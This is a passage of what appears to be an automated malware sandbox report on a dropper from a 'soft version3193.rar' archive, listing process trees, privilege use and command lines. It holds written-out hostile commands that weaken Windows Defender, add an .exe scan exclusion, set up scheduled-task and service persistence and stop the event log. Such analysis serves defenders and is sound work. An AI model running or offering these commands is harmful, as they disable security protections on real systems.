840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
840	nuFrcSpmylkm5G1HC88Qwegm.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
4088	eqtpkqwqodik.exe
2236	explortu.exe
2236	explortu.exe
180	powershell.exe
180	powershell.exe
180	powershell.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
3352	powershell.exe
3352	powershell.exe
3352	powershell.exe
1424	powershell.EXE

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1512	OpenWith.exe
2832	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2832	7zFM.exe
Token: 35	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeSecurityPrivilege	2832	7zFM.exe
Token: SeDebugPrivilege	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe
Token: SeDebugPrivilege	4456	xBXjl0R8rYG45a3wzU77TxNo.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	3220	MSBuild.exe
Token: SeBackupPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeSecurityPrivilege	3220	MSBuild.exe
Token: SeDebugPrivilege	1876	mAph8Of7DxihsslLJNYfDDIp.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: 36	752	WMIC.exe
Token: SeIncreaseQuotaPrivilege	752	WMIC.exe
Token: SeSecurityPrivilege	752	WMIC.exe
Token: SeTakeOwnershipPrivilege	752	WMIC.exe
Token: SeLoadDriverPrivilege	752	WMIC.exe
Token: SeSystemProfilePrivilege	752	WMIC.exe
Token: SeSystemtimePrivilege	752	WMIC.exe
Token: SeProfSingleProcessPrivilege	752	WMIC.exe
Token: SeIncBasePriorityPrivilege	752	WMIC.exe
Token: SeCreatePagefilePrivilege	752	WMIC.exe
Token: SeBackupPrivilege	752	WMIC.exe
Token: SeRestorePrivilege	752	WMIC.exe
Token: SeShutdownPrivilege	752	WMIC.exe
Token: SeDebugPrivilege	752	WMIC.exe
Token: SeSystemEnvironmentPrivilege	752	WMIC.exe
Token: SeRemoteShutdownPrivilege	752	WMIC.exe
Token: SeUndockPrivilege	752	WMIC.exe
Token: SeManageVolumePrivilege	752	WMIC.exe
Token: 33	752	WMIC.exe
Token: 34	752	WMIC.exe
Token: 35	752	WMIC.exe
Token: 36	752	WMIC.exe
Token: SeDebugPrivilege	3848	MSBuild.exe
Token: SeShutdownPrivilege	3652	powercfg.exe
Token: SeCreatePagefilePrivilege	3652	powercfg.exe
Token: SeShutdownPrivilege	876	powercfg.exe
Token: SeCreatePagefilePrivilege	876	powercfg.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
2832	7zFM.exe
2832	7zFM.exe
2832	7zFM.exe
2832	7zFM.exe
2832	7zFM.exe
2832	7zFM.exe
2832	7zFM.exe
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
1700	BAEBFIIECB.exe

Suspicious use of SetWindowsHookEx 41 IoCs

pid	Process
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
1512	OpenWith.exe
3444	OpenWith.exe
4732	setup.exe
2096	setup.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe
4724	NSBT2UTHbN3rUH67MwoPLEur.exe
3596	3IfifMzwN9KSsku1z7iQUZZd.exe
1372	G8FbtlgLE3rUkMPXnsq75quh.exe
2616	3IfifMzwN9KSsku1z7iQUZZd.tmp
4020	Install.exe
2404	directwavmp3splitter.exe
1840	Install.exe
1428	directwavmp3splitter.exe
2356	MSBuild.exe
1232	cmd.exe
2384	7785ba0063.exe
2384	7785ba0063.exe
3580	BitLockerToGo.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2832 wrote to memory of 1368	2832	7zFM.exe	104
PID 2832 wrote to memory of 1368	2832	7zFM.exe	104
PID 4732 wrote to memory of 1372	4732	setup.exe	117
PID 4732 wrote to memory of 1372	4732	setup.exe	117
PID 4732 wrote to memory of 1372	4732	setup.exe	117
PID 4732 wrote to memory of 4456	4732	setup.exe	118
PID 4732 wrote to memory of 4456	4732	setup.exe	118
PID 4732 wrote to memory of 4456	4732	setup.exe	118
PID 4732 wrote to memory of 4428	4732	setup.exe	119
PID 4732 wrote to memory of 4428	4732	setup.exe	119
PID 4732 wrote to memory of 4428	4732	setup.exe	119
PID 4732 wrote to memory of 5092	4732	setup.exe	120
PID 4732 wrote to memory of 5092	4732	setup.exe	120
PID 4732 wrote to memory of 5092	4732	setup.exe	120
PID 4732 wrote to memory of 2548	4732	setup.exe	121
PID 4732 wrote to memory of 2548	4732	setup.exe	121
PID 4732 wrote to memory of 4724	4732	setup.exe	122
PID 4732 wrote to memory of 4724	4732	setup.exe	122
PID 4732 wrote to memory of 4724	4732	setup.exe	122
PID 4732 wrote to memory of 840	4732	setup.exe	123
PID 4732 wrote to memory of 840	4732	setup.exe	123
PID 4732 wrote to memory of 3596	4732	setup.exe	124
PID 4732 wrote to memory of 3596	4732	setup.exe	124
PID 4732 wrote to memory of 3596	4732	setup.exe	124
PID 3596 wrote to memory of 2616	3596	3IfifMzwN9KSsku1z7iQUZZd.exe	125
PID 3596 wrote to memory of 2616	3596	3IfifMzwN9KSsku1z7iQUZZd.exe	125
PID 3596 wrote to memory of 2616	3596	3IfifMzwN9KSsku1z7iQUZZd.exe	125
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 5092 wrote to memory of 3220	5092	PXLm4NTG4LxHCIQW6UGEFQZ3.exe	126
PID 4724 wrote to memory of 4020	4724	NSBT2UTHbN3rUH67MwoPLEur.exe	127
PID 4724 wrote to memory of 4020	4724	NSBT2UTHbN3rUH67MwoPLEur.exe	127
PID 4724 wrote to memory of 4020	4724	NSBT2UTHbN3rUH67MwoPLEur.exe	127
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4456 wrote to memory of 3848	4456	xBXjl0R8rYG45a3wzU77TxNo.exe	129
PID 4428 wrote to memory of 1880	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	130
PID 4428 wrote to memory of 1880	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	130
PID 4428 wrote to memory of 1880	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	130
PID 2616 wrote to memory of 2404	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	132
PID 2616 wrote to memory of 2404	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	132
PID 2616 wrote to memory of 2404	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	132
PID 4020 wrote to memory of 1840	4020	Install.exe	133
PID 4020 wrote to memory of 1840	4020	Install.exe	133
PID 4020 wrote to memory of 1840	4020	Install.exe	133
PID 2616 wrote to memory of 1428	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	134
PID 2616 wrote to memory of 1428	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	134
PID 2616 wrote to memory of 1428	2616	3IfifMzwN9KSsku1z7iQUZZd.tmp	134
PID 4428 wrote to memory of 4288	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	135
PID 4428 wrote to memory of 4288	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	135
PID 4428 wrote to memory of 4288	4428	LAjLRnhV4UjOx8B3HbyvLFc4.exe	135
PID 1840 wrote to memory of 5036	1840	Install.exe	137
PID 1840 wrote to memory of 5036	1840	Install.exe	137
PID 1840 wrote to memory of 5036	1840	Install.exe	137

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\soft version3193.rar"
1⤵
- Modifies registry class
PID:512

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1512

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3652

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\soft version3193.rar"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2832
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO01B04EF7\Licenses.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1368

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3444

C:\Users\Admin\Desktop\malware\setup.exe
"C:\Users\Admin\Desktop\malware\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Users\Admin\Documents\SimpleAdobe\G8FbtlgLE3rUkMPXnsq75quh.exe
  C:\Users\Admin\Documents\SimpleAdobe\G8FbtlgLE3rUkMPXnsq75quh.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BAEBFIIECB.exe"
    3⤵
    PID:4416
  - - C:\Users\Admin\AppData\Local\Temp\BAEBFIIECB.exe
      "C:\Users\Admin\AppData\Local\Temp\BAEBFIIECB.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:1700
    - - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:3820
      - C:\Users\Admin\AppData\Local\Temp\1000022001\7785ba0063.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000022001\7785ba0063.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FCAFIJJJKE.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    PID:1232
- C:\Users\Admin\Documents\SimpleAdobe\xBXjl0R8rYG45a3wzU77TxNo.exe
  C:\Users\Admin\Documents\SimpleAdobe\xBXjl0R8rYG45a3wzU77TxNo.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4456
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3848
- C:\Users\Admin\Documents\SimpleAdobe\LAjLRnhV4UjOx8B3HbyvLFc4.exe
  C:\Users\Admin\Documents\SimpleAdobe\LAjLRnhV4UjOx8B3HbyvLFc4.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1880
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4288
- C:\Users\Admin\Documents\SimpleAdobe\PXLm4NTG4LxHCIQW6UGEFQZ3.exe
  C:\Users\Admin\Documents\SimpleAdobe\PXLm4NTG4LxHCIQW6UGEFQZ3.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3220
- C:\Users\Admin\Documents\SimpleAdobe\f8rA590jTVvwofQOQzIn6gvr.exe
  C:\Users\Admin\Documents\SimpleAdobe\f8rA590jTVvwofQOQzIn6gvr.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2548
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3580
- C:\Users\Admin\Documents\SimpleAdobe\NSBT2UTHbN3rUH67MwoPLEur.exe
  C:\Users\Admin\Documents\SimpleAdobe\NSBT2UTHbN3rUH67MwoPLEur.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4724
- - C:\Users\Admin\AppData\Local\Temp\7zS1EB5.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4020
  - - C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe
      .\Install.exe /JudidKE "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1840
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:5036
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:2704
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:4060
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:1112
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:1836
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:4260
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:3180
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:4764
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:3944
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4392
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:968
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4812
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4792
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bjeWJKrHnPpdAGCduF" /SC once /ST 07:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe\" bC /yZzdidB 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:1212
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 980
        5⤵
        Program crash
        
        PID:1896
- C:\Users\Admin\Documents\SimpleAdobe\nuFrcSpmylkm5G1HC88Qwegm.exe
  C:\Users\Admin\Documents\SimpleAdobe\nuFrcSpmylkm5G1HC88Qwegm.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:840
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2136
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3652
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:4812
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:876
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:2392
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:388
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2544
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:4696
- C:\Users\Admin\Documents\SimpleAdobe\3IfifMzwN9KSsku1z7iQUZZd.exe
  C:\Users\Admin\Documents\SimpleAdobe\3IfifMzwN9KSsku1z7iQUZZd.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3596
- - C:\Users\Admin\AppData\Local\Temp\is-MAF96.tmp\3IfifMzwN9KSsku1z7iQUZZd.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-MAF96.tmp\3IfifMzwN9KSsku1z7iQUZZd.tmp" /SL5="$160058,4910089,54272,C:\Users\Admin\Documents\SimpleAdobe\3IfifMzwN9KSsku1z7iQUZZd.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2616
  - - C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe
      "C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2404
  - - C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe
      "C:\Users\Admin\AppData\Local\Direct WAV MP3 Splitter\directwavmp3splitter.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1428
- C:\Users\Admin\Documents\SimpleAdobe\mAph8Of7DxihsslLJNYfDDIp.exe
  C:\Users\Admin\Documents\SimpleAdobe\mAph8Of7DxihsslLJNYfDDIp.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4640
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4816

C:\Users\Admin\Desktop\malware\setup.exe
"C:\Users\Admin\Desktop\malware\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2096

C:\Windows\system32\svchost.exe
